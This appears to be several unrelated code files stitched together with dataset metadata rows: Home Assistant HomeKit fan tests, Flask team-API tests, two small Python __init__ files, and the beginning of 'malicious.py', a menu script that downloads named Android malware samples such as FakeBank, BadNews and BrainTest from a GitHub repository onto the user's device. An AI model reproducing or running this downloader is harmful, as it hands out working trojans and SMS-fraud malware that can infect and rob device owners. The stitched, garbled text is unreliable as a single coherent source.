acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
assert acc.char_swing.value == 0
await acc.run_handler()
await hass.async_block_till_done()
assert acc.char_swing.value == 0
hass.states.async_set(entity_id, STATE_ON, {ATTR_OSCILLATING: True})
await hass.async_block_till_done()
assert acc.char_swing.value == 1
# Set from HomeKit
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 0,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 0)
await hass.async_block_till_done()
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is False
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] is False
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_swing.client_update_value, 1)
await hass.async_block_till_done()
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert len(events) == 2
assert events[-1].data[ATTR_VALUE] is True
async def test_fan_speed(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED,
ATTR_PERCENTAGE: 0,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
await acc.run_handler()
await hass.async_block_till_done()
hass.states.async_set(entity_id, STATE_ON, {ATTR_PERCENTAGE: 100})
await hass.async_block_till_done()
assert acc.char_speed.value == 100
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
]
},
"mock_addr",
)
await hass.async_add_executor_job(acc.char_speed.client_update_value, 42)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert len(events) == 1
assert events[-1].data[ATTR_VALUE] == 42
# Verify speed is preserved from off to on
hass.states.async_set(entity_id, STATE_OFF, {ATTR_PERCENTAGE: 42})
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 0
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert acc.char_speed.value == 42
assert acc.char_active.value == 1
async def test_fan_set_all_one_shot(hass, hk_driver, events):
"""Test fan with speed."""
entity_id = "fan.demo"
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", entity_id, 1, None)
hk_driver.add_accessory(acc)
# Initial value can be anything but 0. If it is 0, it might cause HomeKit to set the
# speed to 100 when turning on a fan on a freshly booted up server.
assert acc.char_speed.value != 0
await acc.run_handler()
await hass.async_block_till_done()
hass.states.async_set(
entity_id,
STATE_OFF,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# Set from HomeKit
call_set_percentage = async_mock_service(hass, DOMAIN, "set_percentage")
call_oscillate = async_mock_service(hass, DOMAIN, "oscillate")
call_set_direction = async_mock_service(hass, DOMAIN, "set_direction")
call_turn_on = async_mock_service(hass, DOMAIN, "turn_on")
call_turn_off = async_mock_service(hass, DOMAIN, "turn_off")
char_active_iid = acc.char_active.to_HAP()[HAP_REPR_IID]
char_direction_iid = acc.char_direction.to_HAP()[HAP_REPR_IID]
char_swing_iid = acc.char_swing.to_HAP()[HAP_REPR_IID]
char_speed_iid = acc.char_speed.to_HAP()[HAP_REPR_IID]
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert not call_turn_on
assert call_set_percentage[0]
assert call_set_percentage[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[0].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[0]
assert call_oscillate[0].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[0].data[ATTR_OSCILLATING] is True
assert call_set_direction[0]
assert call_set_direction[0].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[0].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert len(events) == 3
assert events[0].data[ATTR_VALUE] is True
assert events[1].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[2].data[ATTR_VALUE] == 42
hass.states.async_set(
entity_id,
STATE_ON,
{
ATTR_SUPPORTED_FEATURES: SUPPORT_SET_SPEED
| SUPPORT_OSCILLATE
| SUPPORT_DIRECTION,
ATTR_PERCENTAGE: 0,
ATTR_OSCILLATING: False,
ATTR_DIRECTION: DIRECTION_FORWARD,
},
)
await hass.async_block_till_done()
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
# Turn on should not be called if its already on
# and we set a fan speed
await hass.async_block_till_done()
assert len(events) == 6
assert call_set_percentage[1]
assert call_set_percentage[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_percentage[1].data[ATTR_PERCENTAGE] == 42
assert call_oscillate[1]
assert call_oscillate[1].data[ATTR_ENTITY_ID] == entity_id
assert call_oscillate[1].data[ATTR_OSCILLATING] is True
assert call_set_direction[1]
assert call_set_direction[1].data[ATTR_ENTITY_ID] == entity_id
assert call_set_direction[1].data[ATTR_DIRECTION] == DIRECTION_REVERSE
assert events[-3].data[ATTR_VALUE] is True
assert events[-2].data[ATTR_VALUE] == DIRECTION_REVERSE
assert events[-1].data[ATTR_VALUE] == 42
hk_driver.set_characteristics(
{
HAP_REPR_CHARS: [
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_active_iid,
HAP_REPR_VALUE: 0,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_speed_iid,
HAP_REPR_VALUE: 42,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_swing_iid,
HAP_REPR_VALUE: 1,
},
{
HAP_REPR_AID: acc.aid,
HAP_REPR_IID: char_direction_iid,
HAP_REPR_VALUE: 1,
},
]
},
"mock_addr",
)
await hass.async_block_till_done()
assert len(events) == 7
assert call_turn_off
assert call_turn_off[0].data[ATTR_ENTITY_ID] == entity_id
assert len(call_set_percentage) == 2
assert len(call_oscillate) == 2
assert len(call_set_direction) == 2
async def test_fan_restore(hass, hk_driver, events):
"""Test setting up an entity from state in the event registry."""
hass.state = CoreState.not_running
registry = await entity_registry.async_get_registry(hass)
registry.async_get_or_create(
"fan",
"generic",
"1234",
suggested_object_id="simple",
)
registry.async_get_or_create(
"fan",
"generic",
"9012",
suggested_object_id="all_info_set",
capabilities={"speed_list": ["off", "low", "medium", "high"]},
supported_features=SUPPORT_SET_SPEED | SUPPORT_OSCILLATE | SUPPORT_DIRECTION,
device_class="mock-device-class",
)
hass.bus.async_fire(EVENT_HOMEASSISTANT_START, {})
await hass.async_block_till_done()
acc = Fan(hass, hk_driver, "Fan", "fan.simple", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is None
assert acc.char_speed is None
assert acc.char_swing is None
acc = Fan(hass, hk_driver, "Fan", "fan.all_info_set", 2, None)
assert acc.category == 3
assert acc.char_active is not None
assert acc.char_direction is not None
assert acc.char_speed is not None
assert acc.char_swing is not None
| 31.644524 | 88 | 0.616362 | 2,252 | 17,626 | 4.458703 | 0.068828 | 0.05856 | 0.050194 | 0.060552 | 0.845235 | 0.836172 | 0.815058 | 0.779006 | 0.757295 | 0.736779 | 0 | 0.013563 | 0.297231 | 17,626 | 556 | 89 | 31.701439 | 0.797045 | 0.034324 | 0 | 0.587983 | 0 | 0 | 0.022448 | 0 | 0 | 0 | 0 | 0 | 0.214592 | 1 | 0 | false | 0 | 0.017167 | 0 | 0.017167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d492ce753fd207b328ede22b37e57f737408f897 | 6,493 | py | Python | tests/test_api_teams.py | jroimartin/graph-asset-inventory-api | 1ce0172f5d6a3dc9a1d9f0acd7839398a8b58833 | [
"MIT"
] | 1 | 2021-12-02T07:25:00.000Z | 2021-12-02T07:25:00.000Z | tests/test_api_teams.py | jroimartin/graph-asset-inventory-api | 1ce0172f5d6a3dc9a1d9f0acd7839398a8b58833 | [
"MIT"
] | null | null | null | tests/test_api_teams.py | jroimartin/graph-asset-inventory-api | 1ce0172f5d6a3dc9a1d9f0acd7839398a8b58833 | [
"MIT"
] | 2 | 2021-08-09T15:19:09.000Z | 2021-11-14T19:13:27.000Z | """Tests for the Asset Inventory API."""
import json
from helpers import compare_unsorted_list
from graph_asset_inventory_api.api import TeamReq
def test_get_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams``."""
resp = flask_cli.get('/v1/teams')
data = json.loads(resp.data)
assert compare_unsorted_list(
data, init_api_teams, lambda x: x['id'])
def test_get_teams_pagination(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams`` with pagination."""
resp = flask_cli.get('/v1/teams?page=1&size=2')
data = json.loads(resp.data)
assert compare_unsorted_list(
data, init_api_teams[2:4], lambda x: x['id'])
def test_get_teams_pagination_missing_size(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams`` with pagination when the size
parameter is not specified."""
resp = flask_cli.get('/v1/teams?page=0')
data = json.loads(resp.data)
assert compare_unsorted_list(data, init_api_teams, lambda x: x['id'])
def test_post_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams``."""
team_req = TeamReq('new_identifier', 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 201
created_team = json.loads(resp.data)
assert created_team['id'] is not None
assert created_team['identifier'] == team_req.identifier
assert created_team['name'] == team_req.name
final_teams = init_api_teams + [created_team]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
def test_post_teams_conflict_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams`` with an already existing
identifier."""
team_req = TeamReq(init_api_teams[2]['identifier'], 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 409
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_post_teams_empty_identifier_name(flask_cli, init_api_teams):
"""Tests the API endpoint ``POST /v1/teams`` with an empty identifier or
name string."""
# Empty identifier.
team_req = TeamReq('', 'new_name')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 400
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
# Empty name.
team_req = TeamReq('new_identifier', '')
resp = flask_cli.post(
'/v1/teams',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 400
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_get_teams_id(flask_cli, init_api_teams):
"""Tests the API endpoint ``GET /v1/teams/{id}``."""
team_id = init_api_teams[2]['id']
resp = flask_cli.get(f'/v1/teams/{team_id}')
data = json.loads(resp.data)
assert data == init_api_teams[2]
def test_get_teams_id_not_found_error(flask_cli):
"""Tests the API endpoint ``GET /v1/teams/{id} with an unknown id."""
resp = flask_cli.get('/v1/teams/13371337')
assert resp.status_code == 404
def test_delete_teams_id(flask_cli, init_api_teams):
"""Tests the API endpoint ``DELETE /v1/teams/{id}``."""
team_id = init_api_teams[2]['id']
resp = flask_cli.delete(f'/v1/teams/{team_id}')
assert resp.status_code == 204
final_teams = init_api_teams[:2] + init_api_teams[3:]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
def test_delete_teams_id_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``DELETE /v1/teams/{id}`` with an unknown id."""
resp = flask_cli.delete('/v1/teams/13371337')
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_put_teams(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams``."""
team_id = init_api_teams[2]['id']
team_req = TeamReq(init_api_teams[2]['identifier'], 'new_name')
resp = flask_cli.put(
f'/v1/teams/{team_id}',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 200
updated_team = json.loads(resp.data)
assert updated_team['id'] == team_id
assert updated_team['identifier'] == team_req.identifier
assert updated_team['name'] == team_req.name
final_teams = init_api_teams[:2] + init_api_teams[3:] + [updated_team]
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
final_teams,
lambda x: x['id'],
)
def test_put_teams_id_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams`` with an unknown id."""
team_req = TeamReq(
init_api_teams[2]['identifier'], init_api_teams[2]['name'])
resp = flask_cli.put(
'/v1/teams/31337',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
def test_put_teams_identifier_not_found_error(flask_cli, init_api_teams):
"""Tests the API endpoint ``PUT /v1/teams`` with an unknown identifier."""
team_id = init_api_teams[2]['id']
team_req = TeamReq('identifier1337', init_api_teams[2]['name'])
resp = flask_cli.put(
f'/v1/teams/{team_id}',
data=json.dumps(team_req.__dict__),
content_type='application/json',
)
assert resp.status_code == 404
assert compare_unsorted_list(
json.loads(flask_cli.get('/v1/teams').data),
init_api_teams,
lambda x: x['id'],
)
| 29.116592 | 78 | 0.654397 | 927 | 6,493 | 4.277238 | 0.091694 | 0.072636 | 0.108953 | 0.062295 | 0.878184 | 0.847919 | 0.80454 | 0.778815 | 0.759899 | 0.724338 | 0 | 0.021334 | 0.205914 | 6,493 | 222 | 79 | 29.247748 | 0.747673 | 0.134144 | 0 | 0.554795 | 0 | 0 | 0.104731 | 0.004153 | 0 | 0 | 0 | 0 | 0.19863 | 1 | 0.089041 | false | 0 | 0.020548 | 0 | 0.109589 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d4a2e8b0af5397622be5f2c8902759f4b178f5b7 | 68 | py | Python | venv/Lib/site-packages/pygame_ai/__init__.py | KamilLoska/HeroAttack | a4860b246b032d083303d9dd074ae79facdb5031 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pygame_ai/__init__.py | KamilLoska/HeroAttack | a4860b246b032d083303d9dd074ae79facdb5031 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pygame_ai/__init__.py | KamilLoska/HeroAttack | a4860b246b032d083303d9dd074ae79facdb5031 | [
"MIT"
] | null | null | null | from . import gameobject
from . import steering
from . import utils
| 17 | 24 | 0.779412 | 9 | 68 | 5.888889 | 0.555556 | 0.566038 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.176471 | 68 | 3 | 25 | 22.666667 | 0.946429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d4a7a5af3ae7bb628de34b9be4ff9f78a3ff4083 | 82 | py | Python | app/auth/__init__.py | GinnyGaga/20171202flasky | 298787c1f54b9ece8048fd359d56044716ffa345 | [
"MIT"
] | null | null | null | app/auth/__init__.py | GinnyGaga/20171202flasky | 298787c1f54b9ece8048fd359d56044716ffa345 | [
"MIT"
] | 5 | 2020-03-24T15:26:17.000Z | 2021-02-02T21:42:07.000Z | app/auth/__init__.py | GinnyGaga/flaskyblog | e0e5d8d5bbc38a2237c0a055f1d15f26adb97f7c | [
"MIT"
] | null | null | null | from flask import Blueprint
auth=Blueprint('auth',__name__)
from . import views
| 13.666667 | 31 | 0.780488 | 11 | 82 | 5.454545 | 0.636364 | 0.433333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134146 | 82 | 5 | 32 | 16.4 | 0.84507 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
d4cc86ee44be3ec239230b79dbfb11e87b3f4f49 | 38,398 | py | Python | malicious.py | Anonymous3-SIT/Malicious | df21d56e2abfc35a75cff87f4174f0ecbec796f6 | [
"MIT"
] | 2 | 2020-09-18T09:45:18.000Z | 2021-11-03T13:11:40.000Z | malicious.py | Anonymous3-SIT/Malicious | df21d56e2abfc35a75cff87f4174f0ecbec796f6 | [
"MIT"
] | null | null | null | malicious.py | Anonymous3-SIT/Malicious | df21d56e2abfc35a75cff87f4174f0ecbec796f6 | [
"MIT"
] | 1 | 2021-11-03T13:11:40.000Z | 2021-11-03T13:11:40.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
#####DONT CHANGE THIS########
import sys,os,platform
from time import *
x = platform.system()
import requests
from tqdm import tqdm
#--- Color ---#
W = '\033[0m' # white (default)
R = '\033[31m' # red
G = '\033[1;32m' # green bold
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
fun = "Download Succes ^_^"
now = strftime("%T")
bulan = strftime("%B")
tahun = strftime("%Y")
#--- Def menu ---#
def banner():
os.system('printf "\t\t_ _ ____ _ _ ____ _ ____ _ _ ____\n\t\t|\/| |__| | | | | | | | | [__ \n\t\t| | | | |___ | |___ | |__| |__| ___]\n\n" | lolcat')
#print(""+R+"I "+C+"████╗ ████║██╔══██╗██║ ██║██╔════╝██║██╔═══██╗██║ ██║██╔════╝ "+R+"I")
#print(""+R+"R "+C+"██╔████╔██║███████║██║ ██║██║ ██║██║ ██║██║ ██║███████╗ "+R+"R")
# print(""+R+"U "+C+"██║╚██╔╝██║██╔══██║██║ ██║██║ ██║██║ ██║██║ ██║╚════██║ "+R+"U")
# print(""+R+"S "+C+"██║ ╚═╝ ██║██║ ██║███████╗██║╚██████╗██║╚██████╔╝╚██████╔╝███████║ "+R+"S")
# print(""+R+"! "+C+"╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═════╝╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ "+R+"!")
def about():
print("\t\t"+B+"<<<<<<| "+R+"About Tool "+B+"|>>>>>>\n")
print("\t"+G+"Made"+B+" with full"+R+" <3"+B+"\t\t")
print("\tAuthor : Mr.TamfanX\t\t\t")
print("\tVersion : 1.1\t\t\t")
print("\tTeam : "+R+"Pem4lang Security")
print("\t"+B+"Thanks to SIT_GM")
menu()
def banner2():
print(""+O+"")
def fontcolor():
print(""+W+"")
#######DONT CHANGE THIS#########
#################### START ANDROID
def Vandroid():
print(""+O+"["+R+"1"+O+"] Agent\t\t["+R+"15"+O+"] Elite\t\t["+R+"29"+O+"] Prasesfee")
print(""+O+"["+R+"2"+O+"] Badnews\t\t["+R+"16"+O+"] Omigo\t\t["+R+"30"+O+"] RecipeSmart")
print(""+O+"["+R+"3"+O+"] Bios\t\t["+R+"17"+O+"] Opfake\t\t["+R+"31"+O+"] Romaticpos")
print(""+O+"["+R+"4"+O+"] BlatanSMS\t\t["+R+"18"+O+"] SmsWorker\t\t["+R+"32"+O+"] Statetss")
print(""+O+"["+R+"5"+O+"] BrainTest\t\t["+R+"19"+O+"] Vietcon\t\t["+R+"33"+O+"] Thinking")
print(""+O+"["+R+"6"+O+"] Claco\t\t["+R+"20"+O+"] Candycorn\t\t["+R+"34"+O+"] Crd")
print(""+O+"["+R+"7"+O+"] DropDialer\t\t["+R+"21"+O+"] Cat\t\t["+R+"35"+O+"] Dendroid")
print(""+O+"["+R+"8"+O+"] FakeBank\t\t["+R+"22"+O+"] Chistescortos\t["+R+"36"+O+"] Ds")
print(""+O+"["+R+"9"+O+"] FakeCMCC\t\t["+R+"23"+O+"] Chistespicanticos\t["+R+"37"+O+"] Facebook")
print(""+O+"["+R+"10"+O+"] FakeDoc\t\t["+R+"24"+O+"] ComFunnys\t\t["+R+"38"+O+"] Fakeav")
print(""+O+"["+R+"11"+O+"] FakeValidation\t["+R+"25"+O+"] ComImagePets\t["+R+"39"+O+"] ArtStation")
print(""+O+"["+R+"12"+O+"] Fobus\t\t["+R+"26"+O+"] ComKitchen\t\t["+R+"40"+O+"] MusicPlayer")
print(""+O+"["+R+"13"+O+"] GinMaster\t\t["+R+"27"+O+"] ComLaughtter\t["+R+"41"+O+"] Settings")
print(""+O+"["+R+"14"+O+"] Masnu\t\t["+R+"28"+O+"] Prasesamor\t\t["+R+"42"+O+"] Back")
try:
menu1 = input("Input Number > "+R+"")
if menu1 == 1:#############done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Agent.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Agent.apk?raw=true' Android/Agent.apk")
print(fun)######done
elif menu1 == 2:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BadNews.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'BadNews.A.apk?raw=true' Android/BadNews.apk")
print(fun)#######done
elif menu1 == 3:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Bios.NativeMaliciousCode.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Bios.NativeMaliciousCode.apk?raw=true' Android/Bios.apk")
print(fun)#####done
elif menu1 == 4:########done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Blatantsms.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Blatantsms.apk?raw=true' Android/Blatantsms.apk")
print(fun)#####done
elif menu1 == 5:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/BrainTest.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'BrainTest.apk?raw=true' Android/BrainTest.apk")
print(fun)#####done
elif menu1 == 6:##########done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Claco.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Claco.A.apk?raw=true' Android/Claco.apk")
print(fun)#####done
elif menu1 == 7:####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/Dropdialer.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'Dropdialer.apk?raw=true' Android/DropDialer.apk")
print(fun)#####done
elif menu1 == 8:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeBank.B.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeBank.B.apk?raw=true' Android/FakeBank.apk")
print(fun)#####done
elif menu1 == 9:######done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeCMCC.A.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeCMCC.A.apk?raw=true' Android/FakeCMCC.apk")
print(fun)#####done
elif menu1 == 10:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeDoc.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
os.system("mv 'FakeDoc.apk?raw=true' Android/FakeDoc.apk")
print(fun)#####done
elif menu1 == 11:#####done
print(""+G+"")
chunk_size = 1024
url = 'https://github.com/Ractomes/Viruses/blob/master/samples/FakeValidation.apk?raw=true'
r = requests.get(url, stream = True)
size = int(r.headers['content-length'])
filename = url.split('/')[-1]
with open(filename, 'wb') as f:
for data in tqdm(iterable = r.iter_content(chunk_size = chunk_size),total = size/chunk_size, unit = ' KB'):
f.write(data)
